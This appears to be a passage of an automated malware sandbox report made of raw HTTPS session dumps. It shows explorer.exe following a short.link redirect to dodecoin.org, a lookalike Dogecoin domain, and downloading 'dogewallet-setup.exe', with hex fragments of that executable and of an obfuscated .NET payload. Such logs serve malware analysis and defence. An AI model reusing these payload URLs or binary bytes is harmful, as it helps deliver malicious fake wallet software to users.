                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1286INData Raw: 00 0f 00 1b 00 0f 00 1c 00 0f 00 1d 00 0f 00 1e 00 0f 00 1f 00 1e 00 21 00 20 00 22 00 21 00 24 00 23 00 25 00 24 00 27 00 26 00 28 00 27 00 2a 00 29 00 2b 00 29 00 2c 00 2b 00 00 00 00 00 38 00 80 97 00 00 00 00 00 00 00 00 77 7f 80 97 00 00 00 00 00 00 00 00 83 7f 80 97 00 00 00 00 00 00 00 00 85 7f 80 97 00 00 00 00 6b 00 aa 06 6b 00 04 07 7f 00 04 07 6b 00 ed 07 7f 00 ed 07 7f 00 00 08 6b 00 00 08 76 7f a6 08 84 7f a6 08 01 01 d4 08 13 01 ed 07 82 7f d3 09 82 7f d8 09 82 7f dd 09 82 7f e2 09 82 7f e7 09 82 7f ec 09 82 7f f1 09 82 7f f6 09 82 7f fb 09 00 00 00 36 ef bb 8c ef ba 87 30 30 00 32 e7 95 99 ef ba 88 30 30 00 db 93 e8 b1 86 da 8b 30 30 00 e7 95 99 da 95 da 94 30 30 00 33 d9 b7 31 31 30 00 ef bb b2 33 35 31 30 00 e5 84 bf e5 a4 a7 36 31 30 00
                                                                                                                                                                                                          Data Ascii: ! "!$#%$'&('*)+),+8wkkkkv600200000031103510610
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1302INData Raw: 8b 32 34 00 d9 ba da 88 db 92 32 34 00 da 94 ef ba 82 db 93 32 34 00 31 ef bb 8c db 93 32 34 00 31 da bf da 94 32 34 00 37 db 88 da aa 32 34 00 36 da 95 d9 b7 32 34 00 d9 ba ef bb b2 30 33 34 00 da 94 da 93 36 33 34 00 e5 9f 83 da 88 37 33 34 00 3c 3e 6f 5f 5f 33 34 00 e5 85 8b da 95 ef ba 82 33 34 00 db 93 e6 b3 a2 db 88 33 34 00 ef ad a2 ef ba 82 da 94 33 34 00 da 94 db 88 da 96 33 34 00 30 d9 b1 da 96 33 34 00 da 88 ef bb 8c da 99 33 34 00 ef ba 88 e8 b1 86 d9 b1 33 34 00 e6 96 af 37 da bf 33 34 00 32 e5 a4 a7 da 99 34 34 00 d9 af da aa d9 ba 34 34 00 34 db 8b ef ba 87 35 34 00 db 88 35 da 8b 35 34 00 db 84 db 84 da 94 35 34 00 e8 89 be e6 b3 a2 da 95 35 34 00 e5 84 bf da ab e6 96 af 35 34 00 db 8b 31 da bf 35 34 00 db 93 e5 a4 a7 31 36 34 00 53 79 73
                                                                                                                                                                                                          Data Ascii: 242424124124724624034634734<>o__3434343434034343473424444454554545454154164Sys
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1318INData Raw: e6 b3 a2 db 8b da 91 38 00 d9 b7 da 93 da 9f da 91 38 00 e5 9f 83 31 ef bb ac da 91 38 00 da 93 ef ba 87 d9 af da 91 38 00 da ab ef ba 87 d9 af da 91 38 00 e7 95 99 ef bb ac da bf da 91 38 00 ef bb ac ef ba 81 35 db 92 38 00 39 ef bb 90 36 db 92 38 00 da aa ef ba 88 da 93 db 92 38 00 e6 b3 a2 da aa da 95 db 92 38 00 db 84 ef ba 82 da 96 db 92 38 00 ef ba 88 da 99 e7 95 99 db 92 38 00 d9 b7 e7 95 99 da ab db 92 38 00 db 93 ef ad a2 35 da 93 38 00 da 88 da aa e5 9f 83 da 93 38 00 ef bb b2 da ab db 85 da 93 38 00 ef bb b2 30 da 88 da 93 38 00 e8 b1 86 db b6 da 91 da 93 38 00 db 93 e5 84 bf e7 95 99 da 93 38 00 35 32 da 99 da 93 38 00 e8 b1 86 e5 85 8b 34 db 93 38 00 db 92 e8 89 be 36 db 93 38 00 ef bb ac da bf db 84 db 93 38 00 d9 b7 da 95 e5 85 8b db 93 38
                                                                                                                                                                                                          Data Ascii: 8818888589688888858880888528486888
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1334INData Raw: 82 d9 ba e6 b3 a2 ef ba 81 00 ef ba 81 ef ba 87 da bf e6 b3 a2 ef ba 81 00 ef ba 88 ef bb 8c da bf e6 b3 a2 ef ba 81 00 db 93 e7 95 99 31 e5 a4 a7 ef ba 81 00 da 8b e8 89 be e8 b1 86 e5 a4 a7 ef ba 81 00 31 36 ef ba 88 e5 a4 a7 ef ba 81 00 e5 84 bf e5 84 bf da 99 e5 a4 a7 ef ba 81 00 e7 95 99 e5 85 8b e5 a4 a7 e5 a4 a7 ef ba 81 00 da 91 e6 b3 a2 d9 b1 e5 a4 a7 ef ba 81 00 33 ef ba 81 d9 ba e5 a4 a7 ef ba 81 00 38 e5 85 8b 38 da aa ef ba 81 00 33 e8 89 be db 84 da aa ef ba 81 00 da 96 37 db 93 da aa ef ba 81 00 ef ba 87 ef bb 90 e5 a4 a7 da aa ef ba 81 00 d9 af d9 ba ef bb ac da aa ef ba 81 00 da 91 ef bb 8c 31 da ab ef ba 81 00 da 9f da 91 33 da ab ef ba 81 00 ef bb ac da bf 34 da ab ef ba 81 00 31 da 99 e5 9f 83 da ab ef ba 81 00 39 ef bb ac db 93 da ab
                                                                                                                                                                                                          Data Ascii: 1163883713419
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC1350INData Raw: b3 a2 db 85 00 da 9f db 92 e5 85 8b e6 b3 a2 db 85 00 ef ba 82 e7 95 99 da 8b e6 b3 a2 db 85 00 39 30 db 8b e6 b3 a2 db 85 00 db 85 30 db 92 e6 b3 a2 db 85 00 d9 ba 34 da 96 e6 b3 a2 db 85 00 ef ba 81 da 91 da 99 e6 b3 a2 db 85 00 da bf db 88 da 9f e6 b3 a2 db 85 00 e7 95 99 ef ba 87 ef ad a2 e6 b3 a2 db 85 00 da 96 ef bb b2 e5 a4 a7 e6 b3 a2 db 85 00 db 85 ef bb b2 da ab e6 b3 a2 db 85 00 da 9f da 93 e6 96 af e6 b3 a2 db 85 00 da 93 da bf d9 af e6 b3 a2 db 85 00 db b6 36 d9 ba e6 b3 a2 db 85 00 db 93 36 37 e5 a4 a7 db 85 00 ef bb 8c db 84 ef ba 81 e5 a4 a7 db 85 00 da 88 e6 b3 a2 db 84 e5 a4 a7 db 85 00 da aa e7 95 99 db 85 e5 a4 a7 db 85 00 ef ba 81 e6 b3 a2 da 88 e5 a4 a7 db 85 00 da aa da 99 db 8b e5 a4 a7 db 85 00 da 91 33 da 9f e5 a4 a7 db 85 00 d9
                                                                                                                                                                                                          Data Ascii: 90046673
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1366INData Raw: 99 e7 95 99 da 88 00 33 e6 96 af ef ad a2 e7 95 99 da 88 00 ef ad a2 da 94 e6 b3 a2 e7 95 99 da 88 00 e6 b3 a2 36 e5 a4 a7 e7 95 99 da 88 00 36 ef ba 81 e5 a4 a7 e7 95 99 da 88 00 e5 84 bf e5 9f 83 ef bb ac e7 95 99 da 88 00 e6 b3 a2 da aa ef bb ac e7 95 99 da 88 00 ef bb ac ef ba 82 e6 96 af e7 95 99 da 88 00 da 91 da 94 32 da 99 da 88 00 ef bb 8c e8 b1 86 e5 a4 a7 da 99 da 88 00 ef bb ac db 92 da aa da 99 da 88 00 db 84 e5 84 bf d9 b1 da 99 da 88 00 31 e5 85 8b ef bb b2 da 99 da 88 00 e8 b1 86 da 9f ef bb b2 da 99 da 88 00 db 88 ef ba 88 37 da 9f da 88 00 ef ba 87 ef ba 88 ef ba 82 da 9f da 88 00 da 93 ef ba 82 e5 9f 83 da 9f da 88 00 31 ef bb ac db 8b da 9f da 88 00 db b6 34 da 93 da 9f da 88 00 e6 b3 a2 ef ba 82 e7 95 99 da 9f da 88 00 db 8b db b6 e7
                                                                                                                                                                                                          Data Ascii: 36621714
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1382INData Raw: af 33 ef bb ac db 8b 00 da 91 e5 84 bf 39 ef bb ac db 8b 00 ef ba 81 db 84 ef ba 82 ef bb ac db 8b 00 e6 96 af d9 ba e5 85 8b ef bb ac db 8b 00 d9 ba db b6 db 93 ef bb ac db 8b 00 e5 9f 83 39 da 99 ef bb ac db 8b 00 e7 95 99 e5 a4 a7 e6 96 af ef bb ac db 8b 00 d9 b1 35 e5 84 bf ef bb ac db 8b 00 38 db 93 35 e6 96 af db 8b 00 ef bb ac db 92 36 e6 96 af db 8b 00 e7 95 99 db 8b 38 e6 96 af db 8b 00 db 88 da 91 e5 9f 83 e6 96 af db 8b 00 32 30 ef ba 87 e6 96 af db 8b 00 ef bb 90 da 9f da 95 e6 96 af db 8b 00 37 ef ba 82 d9 b1 e6 96 af db 8b 00 da 91 d9 ba d9 ba e6 96 af db 8b 00 ef ba 82 ef ba 82 da bf e6 96 af db 8b 00 db 85 d9 af 30 d9 af db 8b 00 38 34 db 8b d9 af db 8b 00 ef bb ac da 91 da 95 d9 af db 8b 00 37 31 db b6 d9 af db 8b 00 e5 9f 83 34 e8 89 be
                                                                                                                                                                                                          Data Ascii: 39958568207084714
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1398INData Raw: ef bb b2 da 99 e6 b3 a2 db 92 00 d9 b7 db 8b da 9f e6 b3 a2 db 92 00 d9 af e7 95 99 da 9f e6 b3 a2 db 92 00 e6 b3 a2 36 da aa e6 b3 a2 db 92 00 db 84 db b6 ef bb ac e6 b3 a2 db 92 00 da 88 ef bb 90 e6 96 af e6 b3 a2 db 92 00 35 30 35 e5 a4 a7 db 92 00 38 da bf 35 e5 a4 a7 db 92 00 ef ba 81 37 38 e5 a4 a7 db 92 00 da 94 d9 b7 38 e5 a4 a7 db 92 00 e7 95 99 e8 89 be e6 b3 a2 e5 a4 a7 db 92 00 31 ef ba 82 ef bb 90 da aa db 92 00 e5 84 bf 33 da 95 da aa db 92 00 da aa ef ba 81 e6 b3 a2 da aa db 92 00 33 ef bb 90 e6 b3 a2 da aa db 92 00 e7 95 99 39 e5 a4 a7 da aa db 92 00 d9 b1 38 32 da ab db 92 00 ef ba 81 da 96 34 da ab db 92 00 32 d9 ba db 93 da ab db 92 00 ef ba 81 da 8b e7 95 99 da ab db 92 00 ef ba 88 ef bb 90 30 ef bb ac db 92 00 d9 af ef bb 8c 31 ef bb
                                                                                                                                                                                                          Data Ascii: 6505857881339824201
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1414INData Raw: ba 82 da ab da bf d9 b7 da 95 00 da 93 da 9f 38 d9 ba da 95 00 ef bb ac e7 95 99 db 92 d9 ba da 95 00 e8 b1 86 db 85 da 94 d9 ba da 95 00 30 e6 b3 a2 e6 96 af d9 ba da 95 00 31 da 88 db b6 d9 ba da 95 00 ef ba 88 ef ad a2 e5 84 bf d9 ba da 95 00 da 95 ef bb ac 31 e8 89 be da 95 00 31 db 85 38 e8 89 be da 95 00 da 88 da 88 39 e8 89 be da 95 00 da bf d9 b7 db 8b e8 89 be da 95 00 ef bb 8c db 93 e6 b3 a2 e8 89 be da 95 00 da bf db 93 d9 b7 e8 89 be da 95 00 e5 84 bf d9 ba 33 e5 84 bf da 95 00 39 e8 b1 86 da 99 e5 84 bf da 95 00 ef ba 82 e5 a4 a7 ef bb ac e5 84 bf da 95 00 e6 b3 a2 db 84 db b6 e5 84 bf da 95 00 e7 95 99 da 9f d9 ba e5 84 bf da 95 00 ef bb ac ef ba 87 ef ba 82 da bf da 95 00 ef bb b2 34 db 88 da bf da 95 00 e6 96 af e7 95 99 da 93 da bf da 95
                                                                                                                                                                                                          Data Ascii: 8011189394
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1430INData Raw: da 96 e8 89 be da 99 00 ef bb 8c da bf d9 b1 e8 89 be da 99 00 da 96 ef bb b2 ef bb 90 e5 84 bf da 99 00 d9 af ef bb 90 da 94 e5 84 bf da 99 00 ef ba 88 e8 89 be da 96 e5 84 bf da 99 00 da 93 da 99 e7 95 99 e5 84 bf da 99 00 db 8b da 99 e5 a4 a7 e5 84 bf da 99 00 da 99 e6 b3 a2 e6 96 af e5 84 bf da 99 00 32 e5 84 bf db b6 e5 84 bf da 99 00 d9 b7 db 84 da 9f da bf da 99 00 d9 ba ef ad a2 e5 a4 a7 da bf da 99 00 39 39 e6 96 af da bf da 99 00 da 93 db 84 d9 b1 da bf da 99 00 db 93 d9 b7 33 30 da 9f 00 e7 95 99 db 85 36 30 da 9f 00 e8 89 be 36 37 30 da 9f 00 da 96 ef ad a2 e6 b3 a2 30 da 9f 00 31 db 93 d9 b1 30 da 9f 00 da 91 ef bb 90 37 31 da 9f 00 da 96 ef bb ac db 84 31 da 9f 00 da 91 36 ef ba 88 31 da 9f 00 32 e6 96 af da 96 31 da 9f 00 ef ba 88 da 8b e6
                                                                                                                                                                                                          Data Ascii: 29930606700107116121
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1446INData Raw: 89 be e5 9f 83 e5 84 bf e6 b3 a2 00 da bf e5 a4 a7 da 88 e5 84 bf e6 b3 a2 00 e8 b1 86 e7 95 99 ef bb 90 e5 84 bf e6 b3 a2 00 e7 95 99 da 88 e7 95 99 e5 84 bf e6 b3 a2 00 da 91 da 99 ef ad a2 e5 84 bf e6 b3 a2 00 e7 95 99 e6 b3 a2 db b6 e5 84 bf e6 b3 a2 00 db 92 ef ba 87 d9 ba e5 84 bf e6 b3 a2 00 e7 95 99 e5 85 8b e8 89 be e5 84 bf e6 b3 a2 00 da 88 da 91 e5 84 bf e5 84 bf e6 b3 a2 00 37 ef ba 87 38 da bf e6 b3 a2 00 ef ba 82 da 95 39 da bf e6 b3 a2 00 ef ad a2 32 e8 b1 86 da bf e6 b3 a2 00 d9 b7 da 93 e8 b1 86 da bf e6 b3 a2 00 da aa ef ad a2 e8 b1 86 da bf e6 b3 a2 00 da 8b 39 ef ba 88 da bf e6 b3 a2 00 32 ef bb 90 db 88 da bf e6 b3 a2 00 38 db 88 e7 95 99 da bf e6 b3 a2 00 ef bb 8c da 93 da 99 da bf e6 b3 a2 00 db 93 d9 ba e6 b3 a2 da bf e6 b3 a2 00
                                                                                                                                                                                                          Data Ascii: 7892928
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1462INData Raw: ef ba 81 da 93 ef bb ac 00 ef ad a2 ef ad a2 db 85 da 93 ef bb ac 00 da 93 ef ba 81 ef ba 88 da 93 ef bb ac 00 da 93 db 8b da 88 da 93 ef bb ac 00 da 99 da bf da 91 da 93 ef bb ac 00 ef ba 88 e5 a4 a7 da 96 da 93 ef bb ac 00 36 34 da 9f da 93 ef bb ac 00 da ab db b6 e6 b3 a2 da 93 ef bb ac 00 ef ba 82 db 8b e5 a4 a7 da 93 ef bb ac 00 db b6 e7 95 99 da ab da 93 ef bb ac 00 ef ba 88 da 9f ef bb ac da 93 ef bb ac 00 ef ba 82 ef bb ac ef bb ac da 93 ef bb ac 00 ef ad a2 38 d9 b1 da 93 ef bb ac 00 da aa ef bb ac ef bb b2 da 93 ef bb ac 00 da 93 ef bb 8c d9 ba da 93 ef bb ac 00 db 84 e5 84 bf e8 89 be da 93 ef bb ac 00 e7 95 99 ef bb b2 30 db 93 ef bb ac 00 ef ba 81 ef bb 90 34 db 93 ef bb ac 00 ef ba 81 d9 b1 35 db 93 ef bb ac 00 da 99 ef ba 82 37 db 93 ef bb
                                                                                                                                                                                                          Data Ascii: 6480457
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1478INData Raw: 00 da bf da 8b db 85 32 ef bb b2 00 31 da 9f db 88 32 ef bb b2 00 39 db 8b da 9f 32 ef bb b2 00 36 31 da ab 32 ef bb b2 00 39 db 84 ef bb ac 32 ef bb b2 00 db 84 da bf e6 96 af 32 ef bb b2 00 39 ef ad a2 e5 84 bf 32 ef bb b2 00 e6 b3 a2 e5 a4 a7 da bf 32 ef bb b2 00 e6 b3 a2 da 96 31 33 ef bb b2 00 e6 b3 a2 ef ba 81 ef ba 88 33 ef bb b2 00 da bf da aa da 91 33 ef bb b2 00 d9 b1 e5 85 8b da 96 33 ef bb b2 00 39 db 85 e7 95 99 33 ef bb b2 00 35 ef ba 87 ef ad a2 33 ef bb b2 00 db 93 db 88 da ab 33 ef bb b2 00 33 d9 b7 da bf 33 ef bb b2 00 d9 af 31 31 34 ef bb b2 00 31 da 94 db 88 34 ef bb b2 00 d9 af da 96 da 93 34 ef bb b2 00 ef ba 81 da 96 db 93 34 ef bb b2 00 ef bb 90 ef bb b2 e7 95 99 34 ef bb b2 00 da 93 38 ef bb ac 34 ef bb b2 00 e5 a4 a7 e5 9f 83 e6
                                                                                                                                                                                                          Data Ascii: 212926129229221333393533331141444484
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1494INData Raw: a2 37 e8 89 be 00 e5 85 8b ef ba 87 db b6 37 e8 89 be 00 d9 b7 39 d9 b7 37 e8 89 be 00 ef ad a2 da 8b ef bb 8c 38 e8 89 be 00 ef bb ac da 9f ef bb 90 38 e8 89 be 00 e8 89 be ef ad a2 da 94 38 e8 89 be 00 d9 b7 e8 89 be d9 b7 38 e8 89 be 00 d9 b1 ef ba 88 e5 84 bf 38 e8 89 be 00 e5 9f 83 da 96 30 39 e8 89 be 00 32 d9 ba 38 39 e8 89 be 00 da 8b e5 84 bf 38 39 e8 89 be 00 e5 85 8b da 9f 39 39 e8 89 be 00 e5 84 bf ef bb ac 39 39 e8 89 be 00 33 33 e5 9f 83 39 e8 89 be 00 e8 b1 86 ef bb ac db 88 39 e8 89 be 00 da aa ef ba 81 ef bb 8c 39 e8 89 be 00 e6 96 af db 8b da 9f 39 e8 89 be 00 d9 af 37 e5 a4 a7 39 e8 89 be 00 ef bb 8c da ab e6 96 af 39 e8 89 be 00 da 99 e6 96 af db b6 39 e8 89 be 00 38 e6 b3 a2 e5 84 bf 39 e8 89 be 00 d9 b7 ef bb ac 36 ef ba 81 e8 89 be
                                                                                                                                                                                                          Data Ascii: 779788888092898999993399997999896
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1510INData Raw: 67 00 4b 00 41 00 41 00 41 00 41 00 00 51 48 00 34 00 73 00 49 00 41 00 41 00 41 00 41 00 41 00 41 00 41 00 45 00 41 00 49 00 76 00 4d 00 4c 00 55 00 77 00 75 00 44 00 58 00 49 00 50 00 7a 00 69 00 30 00 44 00 41 00 43 00 5a 00 56 00 4d 00 38 00 6b 00 4b 00 41 00 41 00 41 00 41 00 00 51 48 00 34 00 73 00 49 00 41 00 41 00 41 00 41 00 41 00 41 00 41 00 45 00 41 00 43 00 73 00 4c 00 63 00 2f 00 51 00 4b 00 79 00 55 00 67 00 4c 00 6a 00 77 00 77 00 48 00 41 00 4e 00 79 00 4a 00 54 00 4d 00 73 00 4b 00 41 00 41 00 41 00 41 00 00 51 48 00 34 00 73 00 49 00 41 00 41 00 41 00 41 00 41 00 41 00 41 00 45 00 41 00 48 00 50 00 32 00 44 00 53 00 35 00 31 00 4c 00 79 00 78 00 4f 00 4c 00 6e 00 59 00 48 00 41 00 49 00 70 00 4d 00 66 00 64 00 55 00 4b 00 41 00 41 00 41
                                                                                                                                                                                                          Data Ascii: gKAAAAQH4sIAAAAAAAEAIvMLUwuDXIPzi0DACZVM8kKAAAAQH4sIAAAAAAAEACsLc/QKyUgLjwwHANyJTMsKAAAAQH4sIAAAAAAAEAHP2DS51LyxOLnYHAIpMfdUKAAA
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1526INData Raw: 69 63 61 74 65 20 41 75 74 68 6f 72 69 74 79 20 32 30 31 30 30 1e 17 0d 31 30 30 37 30 31 32 31 33 36 35 35 5a 17 0d 32 35 30 37 30 31 32 31 34 36 35 35 5a 30 7c 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 a9 1d 0d bc 77 11 8a 3a 20 ec fc 13 97 f5 fa 7f 69 94 6b 74 54 10 d5 a5 0a 00 82 85 fb ed 7c 68 4b 2c 5f c5 c3 e5 61 c2 76 b7 3e 66
                                                                                                                                                                                                          Data Ascii: icate Authority 20100100701213655Z250701214655Z0|10UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100"0*H0w: iktT|hK,_av>f


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          4192.168.2.349835104.21.41.11443C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1529OUTGET /u8txqc HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Host: short.link
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1529INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:33 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          x-powered-by: PHP/7.4.24
                                                                                                                                                                                                          location: https://dodecoin.org/dogewallet-setup.exe
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jXGrVCVyUpH%2B2vPO5sQJ5G3mYyar3jnilUNfYdW4XA%2BiTJRHJRgZ5h4uT2Tu50BjZGWWs5ZRP%2FX2CPSjJVHE%2BfzbIoNuv%2BzP3fpwMAK5%2Bzu2Zx6A%2BoLk5H04kWir"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 6c658a293e3a435d-FRA
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1530INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          5192.168.2.349836164.132.207.80443C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1530OUTGET /dogewallet-setup.exe HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Host: dodecoin.org
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1530INHTTP/1.1 200 OK
                                                                                                                                                                                                          Last-Modified: Fri, 31 Dec 2021 15:24:20 GMT
                                                                                                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                                                                                                          Content-Length: 592384
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:33 GMT
                                                                                                                                                                                                          Server: LiteSpeed
                                                                                                                                                                                                          Alt-Svc: quic=":443"; ma=2592000; v="35,39,43,44"
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1530INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 86 9c be ec c2 fd d0 bf c2 fd d0 bf c2 fd d0 bf 11 8f d3 be cf fd d0 bf 11 8f d5 be 65 fd d0 bf 11 8f d4 be d4 fd d0 bf 90 88 d4 be d3 fd d0 bf 90 88 d3 be d6 fd d0 bf 90 88 d5 be 89 fd d0 bf 11 8f d1 be c7 fd d0 bf c2 fd d1 bf a3 fd d0 bf 77 88 d5 be c3 fd d0 bf 77 88 2f bf c3 fd d0 bf 77 88 d2 be c3 fd d0 bf 52 69 63 68 c2 fd d0 bf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$eww/wRich
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1538INData Raw: 20 6c 00 00 6a 00 ff d7 6a 00 6a 00 68 20 6c 00 00 6a 00 ff d7 6a 00 6a 00 68 d9 77 00 00 6a 00 ff 15 48 d1 41 00 ff d6 8d 05 08 b0 42 00 50 8d 9d 70 f8 ff ff 6a 00 ff 35 00 b0 42 00 b9 01 00 00 00 69 d1 81 01 00 00 03 d3 ff d2 e9 88 00 00 00 68 24 d4 41 00 68 90 5f 44 00 e8 70 e4 ff ff 8b f0 83 c4 08 8b 0e 8b 49 04 8b 4c 31 30 8b 49 04 89 8d 44 f8 ff ff 8b 11 ff 52 04 8d 85 40 f8 ff ff c7 45 fc 00 00 00 00 50 e8 11 e7 ff ff 83 c4 04 8b c8 8b 10 6a 0a 8b 42 20 ff d0 8b 8d 44 f8 ff ff 88 85 6c f8 ff ff c7 45 fc ff ff ff ff 85 c9 74 11 8b 01 ff 50 08 85 c0 74 08 8b 10 8b c8 6a 01 ff 12 ff b5 6c f8 ff ff 8b ce e8 5e fa ff ff 8b ce e8 87 f8 ff ff 33 c0 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d f0 33 cd e8 5c 24 00 00 8b e5 5d c3 33 c0 57 8b f9 40 f0 0f
                                                                                                                                                                                                          Data Ascii: ljjjh ljjjhwjHABPpj5Bih$Ah_DpIL10IDR@EPjB DlEtPtjl^3MdY_^[M3\$]3W@
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1546INData Raw: 00 77 13 e8 98 08 00 00 8b dc 85 db 74 1e c7 03 cc cc 00 00 eb 13 50 e8 df 45 00 00 8b d8 59 85 db 74 09 c7 03 dd dd 00 00 83 c3 08 89 5d f4 85 db 0f 84 05 01 00 00 57 53 56 ff 75 10 6a 01 ff 75 20 ff 15 54 d0 41 00 85 c0 0f 84 ec 00 00 00 33 c0 50 50 50 50 50 57 53 ff 75 0c ff 75 08 ff 15 5c d0 41 00 8b f0 85 f6 0f 84 cd 00 00 00 ba 00 04 00 00 85 55 0c 74 30 8b 45 1c 85 c0 0f 84 ba 00 00 00 3b f0 0f 8f b2 00 00 00 6a 00 6a 00 6a 00 50 ff 75 18 57 53 ff 75 0c ff 75 08 ff 15 5c d0 41 00 e9 95 00 00 00 8d 04 36 8d 48 08 3b c1 1b c0 23 c1 74 73 3b c2 77 13 e8 e0 07 00 00 8b fc 85 ff 74 1e c7 07 cc cc 00 00 eb 13 50 e8 27 45 00 00 8b f8 59 85 ff 74 09 c7 07 dd dd 00 00 83 c7 08 89 7d f8 85 ff 74 43 6a 00 6a 00 6a 00 56 57 ff 75 f0 53 ff 75 0c ff 75 08 ff 15
                                                                                                                                                                                                          Data Ascii: wtPEYt]WSVuju TA3PPPPPWSuu\AUt0E;jjjPuWSuu\A6H;#ts;wtP'EYt}tCjjjVWuSuu
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1554INData Raw: 0f 85 b9 03 00 00 8b 46 14 3b 42 14 74 55 0f b6 f8 0f b6 42 14 2b f8 75 18 0f b6 7e 15 0f b6 42 15 2b f8 75 0c 0f b6 7e 16 0f b6 42 16 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1a 0f b6 4e 17 0f b6 42 17 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 5c 03 00 00 8b 46 18 3b 42 18 74 55 0f b6 f8 0f b6 42 18 2b f8 75 18 0f b6 7e 19 0f b6 42 19 2b f8 75 0c 0f b6 7e 1a 0f b6 42 1a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1a 0f b6 4e 1b 0f b6 42 1b 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 ff 02 00 00 8b 46 1c 3b 42 1c 74 55 0f b6 f8 0f b6 42 1c 2b f8 75 18 0f b6 7e 1d 0f b6 42 1d 2b f8 75 0c 0f b6 7e 1e 0f b6 42 1e 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1a 0f b6 4e 1f
                                                                                                                                                                                                          Data Ascii: F;BtUB+u~B+u~B+t3MNB+t3E\F;BtUB+u~B+u~B+t3MNB+t3EF;BtUB+u~B+u~B+t3MN
